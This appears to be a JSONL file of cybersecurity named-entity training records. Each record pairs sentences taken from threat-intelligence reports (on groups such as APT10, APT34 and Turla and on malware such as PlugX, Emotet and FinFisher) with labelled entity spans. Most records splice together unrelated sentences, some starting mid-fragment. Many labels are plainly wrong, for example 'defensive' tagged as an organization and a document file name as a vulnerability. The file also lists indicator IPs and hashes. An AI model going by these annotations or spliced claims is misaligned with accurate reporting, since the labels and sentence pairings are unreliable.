{"text": "The information operations unit , Unit 74455 , was commanded by Colonel Aleksandr Vladimirovich Osadchuk .", "spans": {"THREAT_ACTOR: Unit 74455": [[34, 44]]}, "info": {"id": "cyberner_stix_train_005963", "source": "cyberner_stix_train"}}
{"text": "] com ( and third-levels of this domain ) www3.mefound [ . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke .", "spans": {"THREAT_ACTOR: group": [[63, 68]], "THREAT_ACTOR: Dukes": [[197, 202]], "MALWARE: SeaDuke": [[265, 272]], "MALWARE: HammerDuke": [[277, 287]]}, "info": {"id": "cyberner_stix_train_005964", "source": "cyberner_stix_train"}}
{"text": "There are various types of actors involved in the mobile malware industry : virus writers , testers , interface designers of both the malicious apps and the web pages they are distributed from , owners of the partner programs that spread the malware , and mobile botnet owners . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors . ESET researchers recently published a white paper updating our understanding of the arsenal of the Winnti Group , following a blog post documenting a supply-chain attack targeting the videogame industry in Asia . Two examples are Windows Sysinternals SDelete and Active@ Killdisk .", "spans": {"TOOL: HyperBro Trojan": [[326, 341]], "ORGANIZATION: ESET": [[405, 409]], "THREAT_ACTOR: Winnti Group": [[504, 516]], "TOOL: Windows Sysinternals": [[635, 655]], "TOOL: SDelete": [[656, 663]], "TOOL: Active@ Killdisk": [[668, 684]]}, "info": {"id": "cyberner_stix_train_005965", "source": "cyberner_stix_train"}}
{"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia .", "spans": {"MALWARE: it": [[26, 28]], "ORGANIZATION: government agencies": [[272, 291]]}, "info": {"id": "cyberner_stix_train_005966", "source": "cyberner_stix_train"}}
{"text": "Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER , suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges .", "spans": {"TOOL: BitPaymer": [[28, 37]], "THREAT_ACTOR: INDRIK SPIDER": [[78, 91]], "MALWARE: dropper": [[251, 258]], "SYSTEM: Windows": [[272, 279]]}, "info": {"id": "cyberner_stix_train_005967", "source": "cyberner_stix_train"}}
{"text": "Microsoft Threat Intelligence has observed that the malware used by TERBIUM , dubbed \" Depriz \" by Microsoft , reuses several components and techniques seen in the 2012 attacks , and has been highly customized for each targeted organization . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "THREAT_ACTOR: TERBIUM": [[68, 75]], "THREAT_ACTOR: Depriz": [[87, 93]], "ORGANIZATION: Microsoft": [[99, 108]], "MALWARE: PIVY": [[243, 247], [509, 513]], "ORGANIZATION: chemical makers": [[321, 336]], "ORGANIZATION: government agencies": [[339, 358]], "ORGANIZATION: defense contractors": [[361, 380]], "THREAT_ACTOR: attackers": [[451, 460]], "VULNERABILITY: zero-day": [[468, 476]]}, "info": {"id": "cyberner_stix_train_005968", "source": "cyberner_stix_train"}}
{"text": "Windows We have found multiple components that form an entire spyware system for the Windows platform . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar . Putter Panda : APT2 , MSUpdater .", "spans": {"SYSTEM: Windows": [[0, 7], [85, 92]], "THREAT_ACTOR: Voiceless": [[304, 313]], "THREAT_ACTOR: Putter Panda": [[448, 460]], "THREAT_ACTOR: APT2": [[463, 467]], "THREAT_ACTOR: MSUpdater": [[470, 479]]}, "info": {"id": "cyberner_stix_train_005969", "source": "cyberner_stix_train"}}
{"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . This APT group usually carries out target attacks against government agencies to steal sensitive information .", "spans": {"ORGANIZATION: M-Trends": [[8, 16]], "ORGANIZATION: defensive": [[195, 204]], "ORGANIZATION: emerging": [[209, 217]], "ORGANIZATION: government agencies": [[285, 304]]}, "info": {"id": "cyberner_stix_train_005970", "source": "cyberner_stix_train"}}
{"text": "The targeting of critical infrastructure to disrupt , degrade , or destroy systems is consistent with numerous attack and reconnaissance activities carried out globally by Russian , Iranian , North Korean , U.S. , and Israeli nation state actors . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"ORGANIZATION: critical infrastructure": [[17, 40]], "THREAT_ACTOR: actors": [[239, 245]], "ORGANIZATION: McAfee Advanced Threat Research": [[252, 283]], "FILEPATH: data-gathering implant": [[321, 343]]}, "info": {"id": "cyberner_stix_train_005971", "source": "cyberner_stix_train"}}
{"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "VULNERABILITY: zero-day vulnerability": [[69, 91]], "MALWARE: Epic Turla": [[272, 282]], "ORGANIZATION: education": [[361, 370]]}, "info": {"id": "cyberner_stix_train_005972", "source": "cyberner_stix_train"}}
{"text": "A ZIP archive recovered during our investigations , schtasks.zip , contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service ‘ ProgramDataUpdater . ’ The malicious installation version has a task name and description in English , and the clean uninstall version has a task name and description in Cyrillic .", "spans": {"TOOL: ZIP": [[2, 5]], "FILEPATH: schtasks.zip": [[52, 64]], "MALWARE: CATRUNNER": [[109, 118]], "TOOL: XML": [[152, 155]], "TOOL: ProgramDataUpdater": [[212, 230]]}, "info": {"id": "cyberner_stix_train_005973", "source": "cyberner_stix_train"}}
{"text": "The backdoor code is believed to have been left by mistake by the authors after completing the debugging process . This script relays commands and output between the controller and the system . Outlaw : 45.9.148.125:80 Miner pool . The increasing usage of bring your own device BYOD in hybrid work environments has changed the technology landscape for organizations .", "spans": {"THREAT_ACTOR: Outlaw": [[194, 200]], "IP_ADDRESS: 45.9.148.125:80": [[203, 218]], "TOOL: Miner pool": [[219, 229]], "ORGANIZATION: bring your own device BYOD in hybrid work environments has changed the technology landscape for organizations": [[256, 365]]}, "info": {"id": "cyberner_stix_train_005974", "source": "cyberner_stix_train"}}
{"text": "Coming back to the execution flow , once the spyware hides itself , it starts an Android service named MainService . The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes ‘Gh0st’ as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . When received by a Winnti infected host , it will validate the received packet and listen for a second inbound request containing tasking .", "spans": {"SYSTEM: Android": [[81, 88]], "THREAT_ACTOR: Gh0st RAT 3.6": [[151, 164]], "TOOL: zlib compression": [[173, 189]], "MALWARE: Winnti": [[356, 362]]}, "info": {"id": "cyberner_stix_train_005975", "source": "cyberner_stix_train"}}
{"text": "\" Pitty Tiger \" is also a string transmitted in the network communications of the RAT . In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"THREAT_ACTOR: Pitty Tiger": [[2, 13]], "TOOL: string": [[26, 32]], "TOOL: RAT": [[82, 85]], "ORGANIZATION: banks": [[152, 157]], "ORGANIZATION: law firm": [[162, 170]], "ORGANIZATION: bank": [[177, 181]]}, "info": {"id": "cyberner_stix_train_005976", "source": "cyberner_stix_train"}}
{"text": "Without mobile threat detection , this attack would not be detected , leaving end users and organizations at risk . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain .", "spans": {"MALWARE: document": [[150, 158]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[165, 202]], "THREAT_ACTOR: APT10": [[205, 210]], "ORGANIZATION: FireEye": [[241, 248]], "THREAT_ACTOR: Red Apollo": [[274, 284]], "ORGANIZATION: PwC UK": [[288, 294]], "THREAT_ACTOR: CVNX": [[297, 301]], "ORGANIZATION: BAE Systems": [[305, 316]], "THREAT_ACTOR: Stone Panda": [[319, 330]], "ORGANIZATION: CrowdStrike": [[334, 345]], "THREAT_ACTOR: menuPass Team": [[352, 365]]}, "info": {"id": "cyberner_stix_train_005977", "source": "cyberner_stix_train"}}
{"text": "The division in malware was consistent and definitive at that point .", "spans": {}, "info": {"id": "cyberner_stix_train_005978", "source": "cyberner_stix_train"}}
{"text": "] pw/4 * * * * * 7 ” ( It . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The second task of malware is to ping the CC and get orders .", "spans": {"ORGANIZATION: FireEye": [[46, 53]], "THREAT_ACTOR: APT34": [[63, 68]], "VULNERABILITY: vulnerability": [[111, 124]], "ORGANIZATION: government organization": [[137, 160]]}, "info": {"id": "cyberner_stix_train_005979", "source": "cyberner_stix_train"}}
{"text": "Jaff appeared in multi-million message campaigns for roughly a month and then promptly disappeared as soon as a decryptor was released in mid-June 2017 .", "spans": {"MALWARE: Jaff": [[0, 4]], "TOOL: decryptor": [[112, 121]]}, "info": {"id": "cyberner_stix_train_005980", "source": "cyberner_stix_train"}}
{"text": "All those functions are implemented in asynchronous tasks by “ org.starsizew.i ” . Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable . The malware tries to save the C2 response and encoding it using Encode function . Cisco Secure Network / Cloud Analytics ( Stealthwatch / Stealthwatch Cloud ) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device .", "spans": {"TOOL: Helminth backdoor": [[173, 190]], "TOOL: C2": [[367, 369]], "TOOL: Cisco Secure Network / Cloud Analytics": [[419, 457]], "TOOL: Stealthwatch / Stealthwatch Cloud": [[460, 493]]}, "info": {"id": "cyberner_stix_train_005981", "source": "cyberner_stix_train"}}
{"text": "Further analysis Upon further research , we found this spyware to be developed by a framework similar to Spynote and Spymax , meaning this could be an updated version of these Trojan builders , which allow anyone , even with limited knowledge , to develop full-fledged spyware . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics .", "spans": {"MALWARE: Spynote": [[105, 112]], "MALWARE: Spymax": [[117, 123]], "THREAT_ACTOR: Buckeye": [[322, 329]], "THREAT_ACTOR: Equation Group": [[339, 353]], "THREAT_ACTOR: PROMETHIUM": [[464, 474]]}, "info": {"id": "cyberner_stix_train_005982", "source": "cyberner_stix_train"}}
{"text": "In this case , a sample from the IBM report indicated the document author ‘ gerry.knight ’ which led us to the following three additional samples . spear phishing : 2a0df97277ddb361cecf8726df6d78ac 5e5ea1a67c2538dbc01df28e4ea87472 d30b8468d16b631cafe458fd94cc3196 . spear phishing : 104.218.120.128 .", "spans": {"ORGANIZATION: IBM": [[33, 36]], "FILEPATH: 2a0df97277ddb361cecf8726df6d78ac": [[165, 197]], "FILEPATH: 5e5ea1a67c2538dbc01df28e4ea87472": [[198, 230]], "FILEPATH: d30b8468d16b631cafe458fd94cc3196": [[231, 263]], "IP_ADDRESS: 104.218.120.128": [[283, 298]]}, "info": {"id": "cyberner_stix_train_005983", "source": "cyberner_stix_train"}}
{"text": "At that time , Ginp was a simple SMS stealer whose purpose was only to send a copy of incoming and outgoing SMS messages to the C2 server . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . It is known to use a variety of malware , including Sysget / HelloBridge , PlugX , PoisonIvy , FormerFirstRat , NFlog , and NewCT .", "spans": {"MALWARE: Ginp": [[15, 19]], "ORGANIZATION: ESET": [[210, 214]], "MALWARE: Sysget": [[281, 287]], "MALWARE: HelloBridge": [[290, 301]], "MALWARE: PlugX": [[304, 309]], "MALWARE: PoisonIvy": [[312, 321]], "MALWARE: FormerFirstRat": [[324, 338]], "MALWARE: NFlog": [[341, 346]], "MALWARE: NewCT": [[353, 358]]}, "info": {"id": "cyberner_stix_train_005984", "source": "cyberner_stix_train"}}
{"text": "Stage 3 : Installer that takes DLL side-loading to a new level Stage 3 represents the setup program for FinFisher . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . Decoding is a simple inverse operation . The ransomware will then scan the disk and any files matching predefined criteria are encrypted and the original files are deleted .", "spans": {"MALWARE: FinFisher": [[104, 113]], "THREAT_ACTOR: APT34": [[135, 140]], "VULNERABILITY: Microsoft Office vulnerability": [[155, 185]], "VULNERABILITY: CVE-2017-11882": [[186, 200]], "TOOL: POWRUNER": [[211, 219]], "TOOL: BONDUPDATER": [[224, 235]], "ORGANIZATION: Microsoft": [[259, 268]], "MALWARE: ransomware": [[331, 341]]}, "info": {"id": "cyberner_stix_train_005985", "source": "cyberner_stix_train"}}
{"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency – NSA 's hacking tools and tactics . Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateACT .", "spans": {"THREAT_ACTOR: ShadowBrokers": [[4, 17]], "ORGANIZATION: NSA": [[117, 120]]}, "info": {"id": "cyberner_stix_train_005986", "source": "cyberner_stix_train"}}
{"text": "C2 servers associated with this activity are blocked through Threat Prevention DNS signatures .", "spans": {"TOOL: C2": [[0, 2]], "TOOL: servers": [[3, 10]]}, "info": {"id": "cyberner_stix_train_005987", "source": "cyberner_stix_train"}}
{"text": "The weaponized documents targeted several government entities around the globe , including North America , Europe , and a former USSR state .", "spans": {}, "info": {"id": "cyberner_stix_train_005988", "source": "cyberner_stix_train"}}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]], "ORGANIZATION: development company": [[293, 312]], "FILEPATH: CONFUCIUS_A": [[327, 338]], "FILEPATH: CONFUCIUS_B": [[343, 354]]}, "info": {"id": "cyberner_stix_train_005989", "source": "cyberner_stix_train"}}
{"text": "Dridex itself appeared shortly after the Zeus banking Trojan was taken down .", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: Zeus": [[41, 45]], "MALWARE: Trojan": [[54, 60]]}, "info": {"id": "cyberner_stix_train_005990", "source": "cyberner_stix_train"}}
{"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA . This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"THREAT_ACTOR: cyber group": [[305, 316]], "THREAT_ACTOR: HIDDEN COBRA": [[317, 329]], "FILEPATH: csidl_profile\\appdata\\roaming\\adobe\\ftp.exe": [[364, 407]]}, "info": {"id": "cyberner_stix_train_005991", "source": "cyberner_stix_train"}}
{"text": "At the time of writing , the content served at the given URL on uyghurapps [ . Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak . APT1 were a highly prolific cyber-attack group operating out of China .", "spans": {"THREAT_ACTOR: Turla": [[90, 95]], "THREAT_ACTOR: APT1": [[179, 183]]}, "info": {"id": "cyberner_stix_train_005992", "source": "cyberner_stix_train"}}
{"text": "The same is true for banking malware . The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access .", "spans": {"TOOL: BitPaymer": [[133, 142]], "ORGANIZATION: Microsoft": [[291, 300]], "TOOL: Remote Desktop Protocol": [[304, 327]], "TOOL: RDP": [[330, 333]]}, "info": {"id": "cyberner_stix_train_005993", "source": "cyberner_stix_train"}}
{"text": "Aside from the credential stealing , this malware also includes features like the theft of users ' contact list , collecting phone numbers associated names , and files and photos on the device . Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time—attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware . OceanLotus : ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Loader #1 . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": {"TOOL: RATs": [[205, 209]], "THREAT_ACTOR: threat actor": [[275, 287]], "TOOL: Poison Ivy-based malware": [[377, 401]], "THREAT_ACTOR: OceanLotus": [[404, 414]], "FILEPATH: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[417, 481]], "SYSTEM: Microsoft Exchange server": [[496, 521]], "SYSTEM: Client Access Service": [[593, 614]]}, "info": {"id": "cyberner_stix_train_005994", "source": "cyberner_stix_train"}}
{"text": "The following factors in this cyber attack suggests the possible involvement of Pakistan state sponsored cyber espionage group to mainly spy on India ’s actions related to these Geo-political events ( Uri terror attack and Jammu & Kashmir protests ) .", "spans": {}, "info": {"id": "cyberner_stix_train_005995", "source": "cyberner_stix_train"}}
{"text": "At least eight sellers update the website as frequently as daily , offering newly obtained databases from the U.S . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"THREAT_ACTOR: sellers": [[15, 22]], "THREAT_ACTOR: PROMETHIUM": [[141, 151]], "THREAT_ACTOR: NEODYMIUM": [[156, 165]], "ORGANIZATION: specific individuals": [[210, 230]]}, "info": {"id": "cyberner_stix_train_005996", "source": "cyberner_stix_train"}}
{"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[46, 52], [166, 172]], "TOOL: C&C": [[346, 349]]}, "info": {"id": "cyberner_stix_train_005997", "source": "cyberner_stix_train"}}
{"text": "The Spark Campaign : This campaign uses social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor .", "spans": {"MALWARE: Spark": [[4, 9]], "MALWARE: Spark backdoor": [[130, 144]]}, "info": {"id": "cyberner_stix_train_005998", "source": "cyberner_stix_train"}}
{"text": "Initiating the MQTT client . APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea . The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin.exe to receive commands and exfiltrate . Germany retained its place as the fourth most attacked country in the world , and the most attacked country outside of the anglosphere .", "spans": {"THREAT_ACTOR: APT33": [[29, 34]], "ORGANIZATION: spanning multiple industries": [[64, 92]], "ORGANIZATION: Microsoft": [[193, 202]], "TOOL: Trojan": [[257, 263]], "SYSTEM: Windows": [[278, 285]], "TOOL: Microsoft Background Intelligent Transfer Service": [[301, 350]], "TOOL: (BITS": [[351, 356]], "FILEPATH: bitsadmin.exe": [[359, 372]]}, "info": {"id": "cyberner_stix_train_005999", "source": "cyberner_stix_train"}}
{"text": "It detects this ransomware ( AndroidOS/MalLocker.B ) , as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics , in addition to content-based detection . All of the CnC communications are performed over the HTTP protocol . In should be noted that the tool may not work for the updated versions of ANEL if they are compiled with different options of the obfuscating compiler . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"TOOL: HTTP protocol": [[262, 275]], "THREAT_ACTOR: ANEL": [[352, 356]], "MALWARE: fake / rogue anti - virus products": [[523, 557]]}, "info": {"id": "cyberner_stix_train_006000", "source": "cyberner_stix_train"}}
{"text": "These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is highly attuned to slight configuration issues that may result in their detection , and which would cause them to deploy a different tool instead .", "spans": {}, "info": {"id": "cyberner_stix_train_006001", "source": "cyberner_stix_train"}}
{"text": "More and more smartphone and tablet owners use their devices to access websites , unaware that even the most reputable resources can be hacked . The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors . And the usual RC5 encryption with a key derived from the volume ID of the system drive of the victim machine ( as seen in the PortReuse backdoor , skip-2.0 and some ShadowPad variants ) is not present either . They will frequently compromise a system to then place the hidden service on that particular system .", "spans": {"ORGANIZATION: defense contractors": [[331, 350]], "MALWARE: PortReuse backdoor": [[479, 497]], "MALWARE: skip-2.0": [[500, 508]], "MALWARE: ShadowPad": [[518, 527]]}, "info": {"id": "cyberner_stix_train_006002", "source": "cyberner_stix_train"}}
{"text": "To spread the toolset , the Dukes used a wrapper to combine OnionDuke with legitimate applications , created torrent files containing these trojanized applications , then uploaded them to websites hosting torrent files .", "spans": {"THREAT_ACTOR: Dukes": [[28, 33]], "MALWARE: OnionDuke": [[60, 69]]}, "info": {"id": "cyberner_stix_train_006003", "source": "cyberner_stix_train"}}
{"text": "The WebView-based overlay is loading an HTML page provided by the C2 in response to the package name provided by the bot . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . The payload is based on “ Nameless Backdoor ” which has been publicly available for more than ten years .", "spans": {"THREAT_ACTOR: APT10": [[246, 251]], "ORGANIZATION: MSP": [[303, 306]], "MALWARE: Nameless Backdoor": [[344, 361]]}, "info": {"id": "cyberner_stix_train_006004", "source": "cyberner_stix_train"}}
{"text": "co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia . Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers . Brief Description : Doc file weaponized with Exploit . Although Mandiant has no data on the objectives of this threat actor , their broad targeting across industries and geographies is consistent with a targeting calculus most commonly seen among financially motivated groups .", "spans": {"MALWARE: RuMMS": [[195, 200]], "SYSTEM: Android": [[224, 231]], "MALWARE: Android": [[336, 343]], "THREAT_ACTOR: NEODYMIUM": [[410, 419]], "TOOL: Wingbird": [[534, 542]], "ORGANIZATION: Mandiant": [[644, 652]]}, "info": {"id": "cyberner_stix_train_006005", "source": "cyberner_stix_train"}}
{"text": "STRING & DATA OBFUSCATION Bread apps have used many innovative and classic techniques to hide strings from analysis engines . Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . User Account Management System . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": {"TOOL: CVE software vulnerabilities": [[308, 336]]}, "info": {"id": "cyberner_stix_train_006006", "source": "cyberner_stix_train"}}
{"text": "Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . Based on this , we believe the Rancor attackers were targeting political entities .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT32": [[34, 39]], "THREAT_ACTOR: Rancor": [[158, 164]], "THREAT_ACTOR: attackers": [[165, 174]], "ORGANIZATION: political entities": [[190, 208]]}, "info": {"id": "cyberner_stix_train_006007", "source": "cyberner_stix_train"}}
{"text": "The tool uses the Windows Management Instrumentation ( WMI ) event consumer for persistence by installing a script to the system's WMI registry .", "spans": {"SYSTEM: Windows": [[18, 25]], "TOOL: Management Instrumentation": [[26, 52]], "TOOL: WMI": [[55, 58], [131, 134]]}, "info": {"id": "cyberner_stix_train_006008", "source": "cyberner_stix_train"}}
{"text": "In April 2013 , a third-party vendor published a report about a cyberespionage group using custom malware and stolen certificates in their operations .", "spans": {}, "info": {"id": "cyberner_stix_train_006009", "source": "cyberner_stix_train"}}
{"text": "EventBot decryption of packets from the C2 Decryption of packets from the C2 using Curve25519 . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: VBA2Graph": [[119, 128]], "MALWARE: PupyRAT backdoor": [[234, 250]], "THREAT_ACTOR: APT35": [[283, 288]]}, "info": {"id": "cyberner_stix_train_006010", "source": "cyberner_stix_train"}}
{"text": "That was our first hint that we were looking at KASPERAGENT .", "spans": {"MALWARE: KASPERAGENT": [[48, 59]]}, "info": {"id": "cyberner_stix_train_006011", "source": "cyberner_stix_train"}}
{"text": "The short URL redirects to the application page at Google Play . From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . While researching this campaign approximately 180 variants were located in the wild . As MuddyWater is assessed to be primarily focused on cyberespionage , it is very likely that data theft is the primary objective behind the Earth Vetala campaign .", "spans": {"SYSTEM: Google Play": [[51, 62]], "ORGANIZATION: consumer products corporations": [[94, 124]], "THREAT_ACTOR: APT32": [[171, 176]], "THREAT_ACTOR: MuddyWater": [[289, 299]]}, "info": {"id": "cyberner_stix_train_006012", "source": "cyberner_stix_train"}}
{"text": "The core malware ’ s icon is hidden . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . Layers of obfuscation , encryption , and the use of randomized file names hid the installation process . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": {"MALWARE: decoy slideshow": [[46, 61]], "THREAT_ACTOR: Web Services APT29": [[292, 310]], "SYSTEM: C2": [[386, 388]], "MALWARE: malware": [[392, 399]], "MALWARE: HAMMERTOSS": [[410, 420]]}, "info": {"id": "cyberner_stix_train_006013", "source": "cyberner_stix_train"}}
{"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) .", "spans": {"MALWARE: wuaupdt.exe": [[0, 11]], "TOOL: CMD": [[17, 20]], "TOOL: Data Execution Prevention": [[258, 283]], "TOOL: DEP": [[286, 289]], "TOOL: Address Space Layout Randomization": [[295, 329]], "TOOL: ASLR": [[332, 336]]}, "info": {"id": "cyberner_stix_train_006014", "source": "cyberner_stix_train"}}
{"text": "Figure 26 : the kill switch code snippet Evidence implies that the “ Agent Smith ” actor is currently laying the groundwork , increasing its Google Play penetration rate and waiting for the right timing to kick off attacks . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . In our research , we were also able to track two groups targeting the hospitality sector , using separate but similar infrastructure , tools and techniques . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": {"MALWARE: Agent Smith": [[69, 80]], "SYSTEM: Google Play": [[141, 152]], "MALWARE: botnet encompassed": [[288, 306]], "ORGANIZATION: financial institutions": [[381, 403]], "SYSTEM: Cisco Secure protections": [[621, 645]], "THREAT_ACTOR: the types of spam": [[673, 690]]}, "info": {"id": "cyberner_stix_train_006015", "source": "cyberner_stix_train"}}
{"text": "other features , but these aren ’ t as effective . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks . 0xdead ) All protocols use their standard assigned ports.[2][3 ] Dragonfly has used SMB for C2.[4 ]", "spans": {"THREAT_ACTOR: Gorgon Group": [[57, 69]], "THREAT_ACTOR: Dragonfly": [[263, 272]], "TOOL: SMB": [[282, 285]], "SYSTEM: C2.[4": [[290, 295]]}, "info": {"id": "cyberner_stix_train_006016", "source": "cyberner_stix_train"}}
{"text": "However , FinFisher is in a different category of malware for the level of its anti-analysis protection . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . The commands are pretty much self-explanatory . This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers ( OEMs ) leveraged across the world .", "spans": {"MALWARE: FinFisher": [[10, 19]], "THREAT_ACTOR: Spring Dragon group": [[120, 139]], "VULNERABILITY: spearphish exploits": [[166, 185]], "THREAT_ACTOR: threat actor": [[316, 328]], "SYSTEM: OT systems": [[404, 414]], "SYSTEM: original equipment manufacturers": [[430, 462]]}, "info": {"id": "cyberner_stix_train_006017", "source": "cyberner_stix_train"}}
